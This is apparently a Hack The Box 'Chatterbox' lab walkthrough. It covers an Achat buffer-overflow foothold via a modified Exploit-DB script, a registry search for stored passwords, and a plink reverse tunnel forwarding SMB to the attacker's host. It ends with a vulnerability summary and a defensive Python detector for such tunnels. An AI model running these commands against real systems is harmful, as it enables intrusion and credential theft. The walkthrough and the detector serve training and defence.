
The Chatterbox (Box 2)

Achat Exploit - https://www.exploit-db.com/exploits/36025

Achat Exploit (Metasploit) - https://www.rapid7.com/db/modules/exploit/windows/misc/achat_bof


Gaining a Foothold



cp /usr/share/exploitdb/exploits/windows/remote/36025.py 3.py
gedit 3.py


From initial enumeration we know the Achat service is vulnerable to a buffer overflow, but the public exploit's payload has to be swapped for a reverse shell before the result is of any use to us.


This is the original payload in the script; to get a reverse shell we need to make some changes to it.


Now we need to run this:




After this, copy the generated buf content into the .py file in place of the original payload.



This is what makes the connection back to us: we have set our own IP address in the payload.


After executing the .py file:

Boom, we get the shell.



Escalation via Stored Passwords


systeminfo



whoami

net users

net user alfred

ipconfig

netstat -ano


Port 445 is open > SMB

arp -a

In the registry:



reg query HKLM /f password /t REG_SZ /s




Remember from netstat -ano that we saw port 445 (SMB) open.


For this we need to download the 32-bit version of plink.exe. After that we set up port forwarding.



We now serve the file on port 80 from Kali and, on the other side, pull the exe onto the target using the low-privilege shell we have gained.




Now we need to make some changes to the SSH server config on Kali: gedit /etc/ssh/sshd_config


We need to change the PermitRootLogin option from prohibit-password so that root can log in with a password >


This allows logging in as root over SSH.

  • After that: service ssh restart
  • Or, if it was not running: service ssh start


plink.exe -l root -pw toor -R 445:127.0.0.1:445 10.10.14.5



After that we have the elevated access we were after.



Exploited Vulnerabilities in HTB Chatterbox


1. Achat Buffer Overflow – Remote Code Execution (Initial Foothold)

Vulnerability:

Achat 0.150 chat server is vulnerable to a buffer overflow when sending a specially crafted Kiss command.

What It Is:

  • A classic stack-based buffer overflow where excess data overwrites EIP (Instruction Pointer), allowing arbitrary code execution.
  • Remote unauthenticated attacker can exploit this to execute shellcode.

Already Discussed:

You:

  • Used a modified Exploit-DB script (36025.py)
  • Injected a custom reverse shell payload
  • Gained a low-privileged reverse shell

Vulnerability Type:

Remote Code Execution via Buffer Overflow (unauthenticated)


2. Registry-Stored Cleartext Passwords – Credential Disclosure (Privilege Escalation)

Vulnerability:

Windows stores sensitive configuration data (including cleartext passwords) in the registry under HKLM.

What It Is:

  • Misconfigured software or admins sometimes store plaintext passwords in registry keys.
  • Readable by authenticated low-privilege users if not secured.

Already Discussed:

You ran:

reg query HKLM /f password /t REG_SZ /s

→ Discovered a stored admin password

Vulnerability Type:

Insecure Credential Storage / Cleartext password disclosure in registry


3. SSH Port Forwarding via plink.exe (Access Expansion)

Vulnerability:

Using exposed credentials and SSH tunneling tools like plink.exe, a user can forward internal services (like SMB on port 445) through SSH to bypass local protections.

What It Is:

  • If SSH is configured to allow password-based root login (on the Kali box), a tunnel can be created from the Windows victim back to the attacker.
  • This exposes privileged internal services to the attacker's system.

Already Discussed:

You:

  • Forwarded port 445 via:
    plink.exe -l root -pw toor -R 445:127.0.0.1:445 <kali-ip>
  • Gained elevated access through the tunnel

Vulnerability Type:

Abuse of Port Forwarding + Credential Reuse → Leads to SYSTEM-level access
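From the defender's side, the plink command used above is exactly the kind of line that shows up in process-creation telemetry. The following Python is an added example (not from this write-up or from plink/OpenSSH): it parses such command lines, flags reverse tunnels that expose local SMB, and flags passwords passed with -pw. The image names, option table, extra sensitive ports and the sample events are assumptions/constructed.

```python
import os
# Services whose exposure via a reverse tunnel merits an alert; 445/SMB is the port abused here, the rest are assumptions.
SENSITIVE_PORTS = {445: "SMB", 3389: "RDP", 5985: "WinRM"}
TUNNEL_IMAGES = {"plink.exe", "plink", "ssh.exe", "ssh"}
OPTS_WITH_ARG = {"-l", "-pw", "-P", "-p", "-i", "-L", "-D", "-R"}  # options that consume the next token

def parse_remote_forward(spec):
    """Parse an -R spec of the form [bind_addr:]listen_port:target_host:target_port."""
    parts = spec.split(":")
    if len(parts) == 4:                  # optional bind address on the SSH server side
        parts = parts[1:]
    if len(parts) != 3:
        raise ValueError(f"unparseable -R spec: {spec}")
    return int(parts[0]), parts[1], int(parts[2])

def analyse_command_line(cmdline):
    """Return a finding dict for an ssh/plink reverse tunnel, or None if the line is benign."""
    argv = cmdline.split()
    if not argv or os.path.basename(argv[0].replace("\\", "/")).lower() not in TUNNEL_IMAGES:
        return None
    finding = {"image": argv[0], "remote_host": "", "forwards": [], "inline_password": False, "reasons": []}
    i = 1
    while i < len(argv):
        arg = argv[i]
        if arg == "-R" and i + 1 < len(argv):
            finding["forwards"].append(parse_remote_forward(argv[i + 1]))
        elif arg == "-pw":               # password on the command line lands in process logs
            finding["inline_password"] = True
        elif not arg.startswith("-"):    # last positional token is the SSH server
            finding["remote_host"] = arg
        i += 2 if arg in OPTS_WITH_ARG else 1
    if not finding["forwards"]:          # no remote forward: plain ssh/plink use is not what we hunt for
        return None
    for listen_port, target_host, target_port in finding["forwards"]:
        if target_port in SENSITIVE_PORTS:
            finding["reasons"].append(f"local {SENSITIVE_PORTS[target_port]} ({target_host}:{target_port}) "
                                      f"reachable from {finding['remote_host']}:{listen_port}")
    if finding["inline_password"]:
        finding["reasons"].append("credential passed via -pw on the command line")
    return finding

# Constructed sample process-creation command lines modelled on the write-up (not real telemetry).
SAMPLE_EVENTS = [
    r"C:\Users\alfred\Desktop\plink.exe -l root -pw toor -R 445:127.0.0.1:445 10.10.14.5",
    r"C:\Windows\System32\OpenSSH\ssh.exe -L 8080:intranet:80 user@jump.example",
]

def scan(events):
    return [f for f in map(analyse_command_line, events) if f is not None]
```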